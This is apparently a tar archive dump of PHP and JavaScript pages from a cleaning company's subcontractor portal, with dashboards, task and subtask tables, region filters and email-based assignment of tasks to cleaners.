//Swal2 pop up askin workr number $('#assignTasks').on('click', function() { // Collect checked subtasks, trimming 'ST-000' var checkedSubtasks = []; $('.select_all_child:checked').each(function() { var subtaskId = $(this).closest('tr').find('td:eq(1)').text().trim().replace('ST-000', ''); checkedSubtasks.push(subtaskId); }); if (checkedSubtasks.length === 0) { Swal.fire({ icon: 'error', title: 'No subtasks selected', text: 'Please select subtasks to assign to a cleaner' }); return; } console.log(checkedSubtasks); Swal.fire({ title: 'Enter Cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { const subtaskIds = checkedSubtasks; return fetch('../send_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, subtask_ids: subtaskIds }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); // Handle response data accordingly if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); </script> subcontractor/reports.php000064400000011011151676701240011646 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; // Initialize necessary services and classes $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); ?> <style> .card { height: 300px; /* Increase the height of the cards */ border-radius: 15px; /* Add rounded corners */ margin-bottom: 20px; /* Add space between the cards */ } .card-body { height: 200px; display: flex; flex-direction: column; justify-content: center; } </style> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Reports</h5> <span>Navigate to different reports</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Reports</a></li> <li class="breadcrumb-item active" aria-current="page">View Reports</li> </ol> </nav> </div> </div> <div class="row mt-20"> <!-- Third card --> <div class="col-md-6"> <a href="report_viewsubtasksdaywise.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-x-circle" style="font-size: 2em;"></i> <h5 class="card-title text-center">Subtasks Day Wise</h5> <p class="card-text">View subtasks day wise</p> </div> </a> </div> <!-- task summary report--> <div class="col-md-6"> <a href="report_TaskSummaryForUser.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-list" style="font-size: 2em;"></i> <h5 class="card-title text-center">Tasks Summary</h5> <p class="card-text">View summary of tasks</p> </div> </a> </div> <!-- SubTasks with notes--> <!-- Fourth card --> <!-- <div class="col-md-6">--> <!-- <a href="reports_acceptedtasksbyusers.php" class="card text-center h-100">--> <!-- <div class="card-body">--> <!-- <i class="ik ik-trending-up" style="font-size: 2em;"></i>--> <!-- <h5 class="card-title">Accepted Tasks by Users</h5>--> <!-- <p class="card-text">View accepted tasks categorized by assigned users</p>--> <!-- </div>--> <!-- </a>--> <!-- </div>--> </div> <div class="row mt-20"> <div class="col-md-6"> <a href="report_subtaskswithnotes.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-file-text" style="font-size: 2em;"></i> <h5 class="card-title text-center">Subtasks with Notes</h5> <p class="card-text">View subtasks with notes</p> </div> </a> </div> <!-- Sixth card --> <!-- <div class="col-md-6">--> <!-- <a href="#" class="card text-center h-100">--> <!-- <div class="card-body">--> <!-- <i class="ik ik-trending-down" style="font-size: 2em;"></i>--> <!-- <h5 class="card-title">Report 6</h5>--> <!-- <p class="card-text">Description of report 6</p>--> <!-- </div>--> <!-- </a>--> <!-- </div>--> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/accepttask.php000064400000001566151676701240012310 0ustar00<?php session_start(); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/Task.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['taskId']) && isset($_POST['companyId'])) { $taskId = $_POST['taskId']; $companyId = $_POST['companyId']; $taskService = new TaskService(); $task = $taskService->getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo($companyId); $task->setIsAssigned(1); if ($taskService->assignTask($task)) { echo 'success'; } else { echo 'error'; } } else { echo 'task_not_found'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/viewunassignedtasks.php000064400000014035151676701240014262 0ustar00<?php // Include head.php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch tasks from the database $tasks = $taskService->getUnassignedTasks(); ?> <div class="main-content"> <div class="container-fluid"> <!-- Your existing HTML content --> <div class="page-header"> <!-- Your existing header --> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>View Tasks</h3> </div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-3"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <label for="filter_frequency" class="col-form-label">Filter Frequency:</label> <select class="form-control" id="filter_frequency"> <option value="">All Frequencies</option> <option value="daily">Daily</option> <option value="3x/week">3x/week</option> </select> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.$task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label> </td> <td> <a href="viewunassignedtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search(this.value).draw(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); }); $('#filter_frequency').on('change', function () { table.column(3).search($(this).val()).draw(); }); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/assigntasktoworkers.php000064400000033743151676701240014317 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); $serviceService = new ServiceService(); $taskService = new TaskService(); // Fetch services for dropdown $services = $serviceService->getAllServicesForDropdown(); // Fetch tasks to display $tasks = $taskService->getTasksByAssignedandnotCompletedAndNotAssigned($companyId); // Make sure $companyId is defined ?> <div class="main-content"> <div class="container-fluid"> <!-- Page header --> <div class="page-header"> <!-- Breadcrumbs --> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Assign Tasks to a cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Assigned Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <!-- Filter options --> <div class="form-group row"> <div class="col-sm-4"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-4"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Task table --> <table id="super_advanced_table" class="table"> <thead> <tr> <th><input type="checkbox" id="select_all_tasks"></th> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><input type="checkbox" class="task_checkbox" value="<?= htmlspecialchars($task->id) ?>"></td> <td><?php echo 'TSK-000' . htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <a href="viewtask.php?id=<?= htmlspecialchars($System->encryptData($task->id)) ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> <!-- Assign tasks button --> <button class="btn btn-primary" id="assignTasks">Assign Tasks to Cleaner</button> </div> <!-- JavaScript for DataTable and actions --> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable(); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val() // Add more filters as needed }; localStorage.setItem('advancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('advancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); // Apply more filters as needed } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); // Remove more filters as needed localStorage.removeItem('advancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(2).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(3).search($(this).val()).draw(); saveFilters(); }); // Handle select all tasks $('#select_all_tasks').on('click', function () { var isChecked = $(this).prop('checked'); $('.task_checkbox').prop('checked', isChecked); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> <script> $(document).ready(function() { // Handle assign tasks button click $('#assignTasks').on('click', function() { var checkedTasks = []; $('.task_checkbox:checked').each(function() { var taskId = $(this).closest('tr').find('td:eq(1)').text().trim().replace('TSK-000', ''); checkedTasks.push(taskId); }); if (checkedTasks.length === 0) { Swal.fire({ icon: 'error', title: 'No Tasks selected', text: 'Please select tasks to assign to a cleaner' }); return; } Swal.fire({ title: 'Enter Cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { return fetch('../send_task_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, task_ids: checkedTasks }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/dashboard.php000064400000030164151676701240012111 0ustar00<?php include('head.php'); require_once '../../Service/ReportsAndDashboardService.php'; $reportsAndDashboardService = new ReportsAndDashboardService(); $pendingTasks = $reportsAndDashboardService->getPendingTasks($companyId); $completedTasks = $reportsAndDashboardService->getCompletedTasks($companyId); //$ongoingSubtasks = $reportsAndDashboardService->getOngoingSubtasks($companyId); $unassignedSubtasks = $reportsAndDashboardService->getUnassignedSubtasks($companyId); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForSubContractor($companyId); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryForSubContractor($companyId); $completedTasks = $taskSummary['completed']; $pendingTasks = $taskSummary['pending']; $ongoingTasks = $taskSummary['total']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodaySubContractor($companyId, date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; $todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?> <div class="main-content"> <div class="container-fluid"> <div class="row grid-layout"> <!-- Ongoing, Completed, Incomplete Subtasks and Chart --> <div class="col-md-8"> <div class="card"> <div class="card-header"> <h3>Overall Subtasks Summary</h3> </div> <div class="card-body"> <div class="row"> <div class="col-md-6"> <div class="widget bg-primary"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Ongoing Subtasks</h6> <h2><?php echo $ongoingSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-box"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $completedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $incompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card-body text-center"> <canvas id="subtasksPieChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header"> <h3>Today's Subtasks Summary: <?php echo date('l, F j, Y'); ?></h3> </div> <div class="card-block"> <div class="row"> <div class="col-md-6"> <div class="widget bg-info"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Total Subtasks to be Completed</h6> <h2><?php echo $todayTotalSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-calendar"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $todayCompletedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-check-circle"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $todayIncompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-alert-circle"></i> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="card-block text-center"> <canvas id="todaySubtasksDoughnutChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="widget bg-danger"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Pending Tasks</h6> <h2><?php echo $pendingTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-alert-circle"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Tasks</h6> <h2><?php echo $completedTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-check-circle"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Unassigned Subtasks</h6> <h2><?php echo $unassignedSubtasks; ?></h2> </div> <div class="icon"> <i class="ik ik-grid"></i> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Scripts for Charts --> <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> <script> // Data for the doughnut chart var completedSubTasks = <?php echo $completedSubTasks; ?>; var incompleteSubTasks = <?php echo $incompleteSubTasks; ?>; // Create Pie Chart for Subtasks new Chart(document.getElementById('subtasksPieChart'), { type: 'doughnut', data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ data: [completedSubTasks, incompleteSubTasks], backgroundColor: ['#28a745', '#fd7e14'], borderColor: ['#ffffff', '#ffffff'], borderWidth: 1 }] }, options: { responsive: true, maintainAspectRatio: false, plugins: { legend: { display: true, position: 'bottom' } } } }); // Data for today's subtasks doughnut chart var todayCompletedSubTasks = <?php echo $todayCompletedSubTasks; ?>; var todayIncompleteSubTasks = <?php echo $todayIncompleteSubTasks; ?>; // Create Doughnut Chart for Today's Subtasks new Chart(document.getElementById('todaySubtasksDoughnutChart'), { type: 'doughnut', data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ data: [todayCompletedSubTasks, todayIncompleteSubTasks], backgroundColor: ['#28a745', '#ffc107'], borderColor: ['#ffffff', '#ffffff'], borderWidth: 1 }] }, options: { responsive: true, maintainAspectRatio: false, plugins: { legend: { display: true, position: 'bottom' } } } }); </script> <?php include('footer.php'); ?> subcontractor/viewsubtasksregionwise.php000064400000023445151676701240015014 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); $taskService = new TaskService(); $System = new System(); $SubContractorId = $_SESSION['user_id']; $subtasksByRegion = $taskService->getAllSubtasksForSubContractorsGroupByRegion($SubContractorId); $regions = array_keys($subtasksByRegion); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>All Subtasks</h5> <span>List of all subtasks assigned to you</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="dashboard.php"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Region Filter Dropdown --> <div class="row mb-12"> <div class="col-md-4"> <div class="form-group"> <label for="regionFilter">Filter by Region</label> <select id="regionFilter" class="form-control"> <option value="">All Regions</option> <?php foreach ($regions as $region) { ?> <option value="<?php echo $region; ?>"><?php echo $region; ?></option> <?php } ?> </select> </div> </div> </div> <div class="row mb-4"> <div class="col-md-12"> <a href="viewsubtasksdaywise.php" class="btn btn-outline-success"><i class="ik ik-layers"></i> Daily View</a> </div> </div> <!-- day wise view--> <!-- Assign tasks to cleaner button --> <div class="row mb-4"> <div class="col-md-12"> <button class="btn btn-primary" id="assignTasks">Assign Tasks to Cleaner</button> </div> </div> <?php foreach ($subtasksByRegion as $region => $subtaskList) { ?> <div class="row subtask-row" data-region="<?php echo $region; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for Region: <?php echo $region; ?></h3> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="table_<?php echo strtolower(str_replace(' ', '_', $region)); ?>"> <thead> <tr> <th>#</th> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td> <input type="checkbox" class="select_all_child" id="selectall_<?php echo $subtask['id']; ?>"> </td> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <script> $(document).ready(function() { // Filter subtasks by region function filterSubtasks() { var selectedRegion = $('#regionFilter').val(); $('.subtask-row').each(function() { var subtaskRegion = $(this).data('region'); var showRow = true; if (selectedRegion && subtaskRegion !== selectedRegion) { showRow = false; } if (showRow) { $(this).show(); } else { $(this).hide(); } }); } // Event listener for region filter $('#regionFilter').on('change', function() { filterSubtasks(); }); // Select all tasks in a region $('#selectAll').on('change', function() { var isChecked = $(this).is(':checked'); $('.select_all_child').prop('checked', isChecked); }); // Assign tasks to cleaner button $('#assignTasks').on('click', function() { // Collect checked subtasks, trimming 'ST-000' var checkedSubtasks = []; $('.select_all_child:checked').each(function() { var subtaskId = $(this).closest('tr').find('td:eq(1)').text().trim().replace('ST-000', ''); checkedSubtasks.push(subtaskId); }); if (checkedSubtasks.length === 0) { Swal.fire({ icon: 'error', title: 'No subtasks selected', text: 'Please select subtasks to assign to a cleaner' }); return; } console.log(checkedSubtasks); Swal.fire({ title: 'Enter Cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { const subtaskIds = checkedSubtasks; return fetch('../send_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, subtask_ids: subtaskIds }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); // Handle response data accordingly if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); }); </script> <?php include('footer.php'); ?> subcontractor/acceptedongoingtaks.php000064400000022777151676701240014211 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); $currentCompanyId = 2; // Replace with dynamic company ID as needed // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedandnotCompleted($companyId); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Accepted Tasks</h5> <span>View details of tasks assigned to your company</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Accepted Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>View Tasks</h3> <div class="card-header-right"> <a href="reassigntasktoworkers.php" class="btn btn-outline-danger"><i class="ik ik-edit-2"></i> Reassign Task</a> </div> </div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-4"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-4"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Assigned Cleaner email </th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.$task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo $task->assignedCleaneremail; ?></td> <td> <label class="badge badge-<?php echo $task->finished ? 'success' : 'yellow'; ?>"><?php echo $task->finished ? 'Completed.' : 'Not Completed'; ?></label> </td> <td> <a href="viewtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val() // Add more filters as needed }; localStorage.setItem('advancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('advancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); // Apply more filters as needed } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); // Remove more filters as needed localStorage.removeItem('advancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/report_viewsubtasksdaywise.php000064400000035472151676701240015704 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $currentUserId = $_SESSION['user_id']; $subtasks = $taskService->getAllSubtasksForSubContractorsGroupByDateReport($startDate, $endDate, $serviceLocationId, $currentUserId); $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Assign Tasks to Cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Task Summary 